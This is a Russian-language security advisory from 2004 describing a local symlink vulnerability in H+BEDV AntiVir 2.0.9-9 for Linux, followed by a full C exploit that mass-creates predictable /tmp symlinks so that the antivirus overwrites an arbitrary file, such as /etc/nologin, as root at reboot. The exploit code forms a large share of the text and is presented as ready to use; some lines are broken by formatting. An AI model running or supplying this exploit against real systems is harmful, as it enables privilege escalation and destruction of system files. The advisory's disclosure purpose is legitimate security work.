| Дата публикации: | 16.01.2004 |
| Всего просмотров: | 1156 |
| Опасность: | Низкая |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Локальная |
| Воздействие: | Повышение привилегий |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | H+BEDV AntiVir |
| Уязвимые версии: AntiVir 2.0.9-9
Описание: Уязвимость обнаружена в AntiVir в Linux версии. Локальный пользователь может получить поднятые привилегии на целевой системе. Программа небезопасно создает временные файлы. В результате локальный пользователь может выполнить нападение символьных ссылок, чтобы перезаписать произвольные файлы на системе с поднятыми привилегиями. Пример/Эксплоит:
example:
./antisys /etc/nologin
(reboot)
ls -l /etc/nologin
rw------- root root /etc/nologin
have phun!
*******************************************************************/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#define PATH "/tmp/.pid_antivir_"
#define START 1000
#define END 2000
int main(int argc, char **argv)
{
int i;
char buf[150];
printf("Antivir 2.0.9-9 exploit - written by l0om
\n");
printf(" WWW.EXCLUDED.ORG\n\n")
if(argc != 2) {
printf("usage: %s <destination-file>\n",argv[0]);
exit(0xff);
}
printf("### hit enter to create or overwrite file %
s: ",argv[1]); fflush(stdout);
read(1, buf, 1); fflush(stdin);
printf("working\n\n");
for(i = START; i < END; i++) {
snprintf(buf, sizeof(buf),"%s%d",PATH,i);
if(symlink(argv[1], buf) == -1) {
fprintf(stderr, "cannot creat symlink from %s to %s
[Nr.%d]\n",buf,argv[1],i);
fprintf(stderr, "skipping...\n");
}
}
printf("\ndone!\n");
printf("on the next reboot we hopefully create or
overwrite %s\n",argv[1]);
return(0x00);
}
URL производителя: http://www.hbedv.com/index.html Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | symlink vul for Antivir / Linux Version 2.0.9-9 (maybe lower) |